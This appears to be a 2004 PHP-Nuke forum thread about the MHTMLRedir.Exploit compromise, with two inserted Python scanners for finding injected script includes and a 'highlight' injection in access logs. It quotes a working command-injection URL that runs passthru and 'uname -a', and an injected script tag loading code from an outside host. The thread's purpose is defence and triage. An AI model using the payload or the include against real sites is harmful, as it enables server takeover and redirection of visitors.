Nuke Cops :: View topic - MHTMLRedir.Exploit
Evaders99 (Site Admin; Joined: Aug 17, 2003; Posts: 12482)
Posted: Sat Nov 20, 2004 7:47 pm

I have the latest Protector, and I don't think it was caught by it, as Protector is called before Admin Secure.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
VinDSL (Site Admin; Joined: Jul 08, 2003; Posts: 1193; Location: Arizona (USA); Site Admin: Lenon.com; Admin: Disipal Designs)
Posted: Sat Nov 20, 2004 10:30 pm

sting wrote:
...looks like someone found another sql injection exploit...

Agreed! It's coming up on everyone's radar lately. I'm gonna 'sticky' this...

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::.
VinDSL (Site Admin; Joined: Jul 08, 2003; Posts: 1193; Location: Arizona (USA); Site Admin: Lenon.com; Admin: Disipal Designs)
Posted: Sat Nov 20, 2004 11:04 pm

From what I've been reading, this is an accurate description...

[image not preserved]

One of the biggest problems, from what I've read, is the admin often cannot get into his site to fix things because it redirects him too. Can't get into phpMyAdmin, cPanel, nothing. It all depends on where 'they' stuck the exploit.

LoL! FireFox is looking better all the time, no?

maczan1205 (Nuke Soldier; Joined: Mar 30, 2004; Posts: 32; Location: Montréal)
Posted: Sun Nov 21, 2004 10:19 am

After removing the code above from the Nuke theme footer, as described, I checked out some other non-Nuke sites that I have on the same domain and found the same code attached to almost every file that had "footer" in the file name.

One good thing came out of this for me, anyway: it scared me enough to "get moving" on upgrading from 7.1 to 7.5 to eliminate the web mail tables and files.
lilacskn (Nuke Soldier; Joined: Mar 11, 2004; Posts: 10; Location: Maine)
Posted: Sun Nov 21, 2004 12:47 pm

I am having this on my site too! It's scaring visitors away, and it's an official site... can anyone help me????

thanks so much!

here is my addy http://jeffbuckleycommunity.com
xoxo jax
chukar (Nuke Cadet; Joined: Nov 19, 2004; Posts: 7)
Posted: Mon Nov 22, 2004 3:53 pm

Not sure if this is the right thread or not, but I'm getting access denied messages when I try to access admin.php. I was hacked over the weekend with a MHTMLRedir.Exploit injection, and I wonder if this is related to that.

Quote:
One of the biggest problems, from what I've read, is the admin often cannot get into his site to fix things because it redirects him too. Can't get into phpMyAdmin, cPanel - nothing. It all depends on where 'they' stuck the exploit.

I fixed the database problem, but now I can't access admin.php.
sting (Site Admin; Joined: Jul 24, 2003; Posts: 1986; Location: Apparently ALWAYS Online. . .)
Posted: Mon Nov 22, 2004 8:40 pm

VinDSL wrote:
From what I've been reading, this is an accurate description...

The big issue here is that some sites with Admin Secure have still been hit. I haven't actually seen what has been used for the exploit - has anyone gotten a log of it yet?

-sting

_________________
Is it paranoia if they are really out to get you?

-------------------------------------------------------
sting usually hangs out at nukehaven.net
Evaders99 (Site Admin; Joined: Aug 17, 2003; Posts: 12482)
Posted: Mon Nov 22, 2004 10:33 pm

Weird, mine hasn't with Admin Secure. I know because they've tried hundreds of times over a week-long period. And another week-long period before that. All various 61.78.61.* addresses.

Admin Secure blocks this as Cross-Site Scripting, so make sure you enable scripting protection.

schtefan (Nuke Cadet; Joined: Jun 14, 2004; Posts: 8)
Posted: Wed Nov 24, 2004 9:36 am

Evaders99 wrote:
These hacks were blocked by the latest Admin Secure. That's how the IP was recorded.

Is it through the Admin? Should I change it?


Last edited by schtefan on Sat Feb 03, 2007 11:45 pm; edited 1 time in total
Evaders99 (Site Admin; Joined: Aug 17, 2003; Posts: 12482)
Posted: Wed Nov 24, 2004 12:45 pm

I'm not really sure. I'm getting an error in Admin Secure when trying to look at the specific details of this hacker. This is the only IP range that is constantly hitting my site, so I expect it is this person, but can someone confirm this?

I would apply all security measures immediately. It's the best chance to catch and stop this hacker. Check the sticky topic for a link to such addons.

solentsurfer (Nuke Cadet; Joined: Nov 25, 2004; Posts: 1)
Posted: Thu Nov 25, 2004 2:16 pm

I don't have Nuke but have an online shop using a MySQL database which has been hacked with MHTMLRedir.exploit.

It appears dynamically; sometimes Norton detects it and sometimes it doesn't. When it does, the bottom address bar on IE shows that another site is trying to be opened. This happens on any page, so it suggests it is in the database, but I cannot find it.

Does anybody have any idea where else it could be or what to look for in a non-Nuke site?

Also, when it does appear, this code is placed just inside the bottom body tag of the page:
Code:
<script language="JavaScript" src="http://www.eagle-inspection.com/data/p.php?i=637...8b&to=http://www.iwar.org.uk/pipermail/infocon/2004-March/2004001207.html"></script>
jacebenson (Nuke Cadet; Joined: Nov 01, 2003; Posts: 6)
Posted: Tue Nov 30, 2004 5:34 pm

Where is the FIX? I need the fix; I've been hit twice.... Please, someone link to Admin Secure if it fixes this? Does it? What can I do? Can I lock the table they're trying to inject? What can I do to stop them?
Evaders99 (Site Admin; Joined: Aug 17, 2003; Posts: 12482)
Posted: Tue Nov 30, 2004 6:00 pm

I don't know about the online shop. It is probably an SQL injection problem; talk to the maker of that software.

Fix:
Again, you must manually go to your config table and delete the code from your table. Next, apply a good security addon: http://www.nukecops.com/postt37460.html

Get an IP address of this person, hopefully, and ban them!

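Two posts above describe where the injected include ends up: just inside the closing body tag of theme footer files, and stored in the config table. This is an added example, not code from the thread, PHP-Nuke or Admin Secure, that scans a site tree or an SQL dump for script includes pointing at hosts outside an allowlist; the hosts and the sample footer and dump row are constructed placeholders.

```python
import os
import re
from urllib.parse import urlsplit

# Absolute-URL script includes, tolerant of the backslash-escaped quotes found in SQL dumps.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*\\?[\"']?\s*(https?://[^\s\"'\\>]+)", re.I)

def find_foreign_scripts(text, allowed_hosts):
    """Return (line_no, url) for each <script src> whose host is not on the allowlist."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    for m in SCRIPT_SRC.finditer(text):
        host = (urlsplit(m.group(1)).hostname or "").lower()
        if host and host not in allowed:
            hits.append((text.count("\n", 0, m.start()) + 1, m.group(1)))
    return hits

def scan_tree(root, allowed_hosts, exts=(".php", ".html", ".htm", ".tpl", ".sql")):
    """Walk a site tree (or a directory of database dumps) and report every foreign script include."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_foreign_scripts(fh.read(), allowed_hosts)
                if hits:
                    report[path] = hits
    return report

# Constructed samples: a theme footer with an injected include before </body>, and one
# row of a config-table dump carrying the same tag with SQL-escaped quotes.
FOOTER_HTML = """<div id="footer">Powered by PHP-Nuke</div>
<script src="/includes/footer.js"></script>
<script language="JavaScript" src="http://attacker.example/data/p.php?i=PLACEHOLDER&to=http://redirect.example/"></script>
</body></html>"""
CONFIG_DUMP = "INSERT INTO nuke_config VALUES ('Site', '<script language=\\\"JavaScript\\\" src=\\\"http://attacker.example/data/p.php\\\"></script>');"
```

Run `scan_tree("/path/to/htdocs", ["www.your-site.example"])` against a copy of the site and a dump of the database to list every file or row that still carries the include.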
sting (Site Admin; Joined: Jul 24, 2003; Posts: 1986; Location: Apparently ALWAYS Online. . .)
Posted: Sun Dec 05, 2004 11:28 am

Ok, think I may have found it. Make sure you have the HIGHLIGHT fix taken care of. The latest versions (2.7) of the nuke fixes seem to take care of it - for some reason on the site I monitor that was hit, sentinel was loaded but did not catch it until AFTER I had loaded the 2.7 patch.

Sentinel covers it as an abuse - script. The latest IP to attempt it was 62.212.77.34 for those of you blocking IPs, and the script looked something like this:

Code:
www.site.com/modules.php?name=Forums&file=viewtopic&t=87&view=previous%0A&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527&rush=echo%20ITSOK;uname%20-a;echo%20ITISOK;
Of course, I hope this doesn't get flagged for banning when I try to submit... lol

EDIT - At the risk of splitting the nuke community once again, I am going to post a link to Raven's site. While I know that the personalities of this site and that one often clash, I feel that this information is vital to the nuke community, and rather than copy/paste, I will attempt to bring good will and better security to the nuke community during this holiday season. Or something.

Highlight fix is detailed here - http://ravenphpscripts.com/article635.html.
-sting

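The highlight request sting quotes is URL-encoded twice and carries its actual command in a second parameter. This is an added example, not code from the thread, Sentinel or Admin Secure, that pulls request lines out of access-log entries, decodes the highlight parameter the same way and flags that pattern; the log lines are constructed, with the request from this post as the second one.

```python
import re
from urllib.parse import unquote
# Indicators from the quoted "highlight" request: a PHP execution function inside highlight,
# and a request superglobal naming the parameter that carries the actual command.
PHP_EXEC = re.compile(r"\b(passthru|system|exec|shell_exec|popen|eval)\s*\(", re.I)
CARRIER = re.compile(r"\$(?:HTTP_GET_VARS|HTTP_POST_VARS|_GET|_POST|_REQUEST)\[['\"]?(\w+)['\"]?\]")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')  # request line of a combined-format log entry

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly and count the rounds; the quoted attack double-encodes (%2527 -> %27 -> ')."""
    rounds = 0
    while rounds < max_rounds and unquote(value) != value:
        value, rounds = unquote(value), rounds + 1
    return value, rounds

def parse_query(url):
    """Split the query on '&' only (never ';', which the carried command contains); values stay raw."""
    pairs = (url.split("?", 1)[1] if "?" in url else "").split("&")
    return {unquote(k): v for k, _, v in (p.partition("=") for p in pairs) if k}

def inspect_request(url):
    """Explain why the 'highlight' parameter looks like the injection and recover the carried command."""
    params = parse_query(url)
    if "highlight" not in params:
        return {"suspicious": False, "reasons": [], "command": None}
    decoded, rounds = decode_fully(params["highlight"])
    reasons, command = [], None
    if rounds > 1:
        reasons.append(f"highlight URL-encoded {rounds} times")
    if "'" in decoded:
        reasons.append("quote in highlight (breaks out of the search string)")
    if PHP_EXEC.search(decoded):
        reasons.append("PHP execution function in highlight")
    carrier = CARRIER.search(decoded)
    if carrier:
        reasons.append(f"command carried in parameter '{carrier.group(1)}'")
        command = decode_fully(params.get(carrier.group(1), ""))[0]
    # Require two independent indicators so an honest search term such as "it's" does not alert.
    return {"suspicious": len(reasons) >= 2, "reasons": reasons, "command": command}

def scan_log(lines):
    """Return (url, finding) for every suspicious request line in an access log."""
    found = ((m.group(1), inspect_request(m.group(1))) for m in map(REQUEST.search, lines) if m)
    return [(url, f) for url, f in found if f["suspicious"]]
# Constructed sample log lines: a benign forum search, then the request quoted in the post above.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Dec/2004:10:00:01 +0000] "GET /modules.php?name=Forums&file=viewtopic&t=87&highlight=admin%20secure HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Dec/2004:10:00:02 +0000] "GET /modules.php?name=Forums&file=viewtopic&t=87&view=previous%0A&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527&rush=echo%20ITSOK;uname%20-a;echo%20ITISOK; HTTP/1.1" 200 4096',
]
```

`scan_log(SAMPLE_LOG)` reports only the second line, with the decoded command `echo ITSOK;uname -a;echo ITISOK;` attached so the entry can be triaged without re-decoding by hand.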
Fiona (Private; Joined: Nov 10, 2004; Posts: 48)
Posted: Mon Dec 06, 2004 5:57 pm

sting wrote:
The latest versions (2.7) of the nuke fixes seem to take care of it

Sting: Does 2.6 handle it?

I'm on earlier versions of Nuke (6.5-7.2) using 2.6, and I can't see anything in 2.7 that significantly affects these earlier versions, which is why I haven't applied it to them.

Any idea if I'm right?

-Fi